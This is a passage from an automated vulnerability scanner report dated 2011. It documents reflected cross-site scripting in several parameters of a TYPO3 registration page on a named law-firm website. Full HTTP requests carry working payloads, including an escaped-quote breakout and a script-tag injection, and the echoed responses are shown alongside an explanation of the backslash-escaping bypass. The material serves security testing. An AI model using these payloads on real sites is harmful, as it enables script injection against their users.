The value of the FE%5Bfe_users%5D%5Busername%5D request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9168b\'%3balert(1)//a686935bb7e was submitted in the FE%5Bfe_users%5D%5Busername%5D parameter. This input was echoed as 9168b\\';alert(1)//a686935bb7e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00004D)%3C/script%3E&FE%5Bfe_users%5D%5B1%5D=0&FE%5Bfe_users%5D%5B2%5D=0&FE%5Bfe_users%5D%5B3%5D=0&FE%5Bfe_users%5D%5B4%5D=0&FE%5Bfe_users%5D%5B5%5D=0&FE%5Bfe_users%5D%5B6%5D=0&FE%5Bfe_users%5D%5Baddress%5D=3&FE%5Bfe_users%5D%5Bcity%5D=3&FE%5Bfe_users%5D%5Bcompany%5D=3&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com&FE%5Bfe_users%5D%5Bgender%5D=0&FE%5Bfe_users%5D%5Bpassword%5D=3&FE%5Bfe_users%5D%5Bpassword_again%5D=3&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG&FE%5Bfe_users%5D%5Btitle%5D=3&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith9168b\'%3balert(1)//a686935bb7e&FE%5Bfe_users%5D%5Bzip%5D=3&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:26:52 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27264

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
<![CDATA[*/
   updateForm('fe_users_form','FE[fe_users][username]','RonaldSmith9168b\\';alert(1)//a686935bb7e');
   updateForm('fe_users_form','FE[fe_users][password]','3');
   updateForm('fe_users_form','FE[fe_users][usergroup][]','1');
   updateForm('fe_users_form','FE[fe_users][name]','');
   updateForm('fe_users_
...[SNIP]...

4.182. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5Bzip%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5Bzip%5D request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bae89\'%3balert(1)//e69150d97f4 was submitted in the FE%5Bfe_users%5D%5Bzip%5D parameter. This input was echoed as bae89\\';alert(1)//e69150d97f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00004D)%3C/script%3E&FE%5Bfe_users%5D%5B1%5D=0&FE%5Bfe_users%5D%5B2%5D=0&FE%5Bfe_users%5D%5B3%5D=0&FE%5Bfe_users%5D%5B4%5D=0&FE%5Bfe_users%5D%5B5%5D=0&FE%5Bfe_users%5D%5B6%5D=0&FE%5Bfe_users%5D%5Baddress%5D=3&FE%5Bfe_users%5D%5Bcity%5D=3&FE%5Bfe_users%5D%5Bcompany%5D=3&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com&FE%5Bfe_users%5D%5Bgender%5D=0&FE%5Bfe_users%5D%5Bpassword%5D=3&FE%5Bfe_users%5D%5Bpassword_again%5D=3&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG&FE%5Bfe_users%5D%5Btitle%5D=3&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith&FE%5Bfe_users%5D%5Bzip%5D=3bae89\'%3balert(1)//e69150d97f4&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:27:04 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27286

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
users_form','FE[fe_users][alias]','');
   updateForm('fe_users_form','FE[fe_users][status]','');
   updateForm('fe_users_form','FE[fe_users][title]','3');
   updateForm('fe_users_form','FE[fe_users][zip]','3bae89\\';alert(1)//e69150d97f4');
   updateForm('fe_users_form','FE[fe_users][city]','3');
   updateForm('fe_users_form','FE[fe_users][zone]','AL');
   updateForm('fe_users_form','FE[fe_users][static_info_country]','AFG');
   updateForm('f
...[SNIP]...

4.183. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5Bzone%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5Bzone%5D request parameter is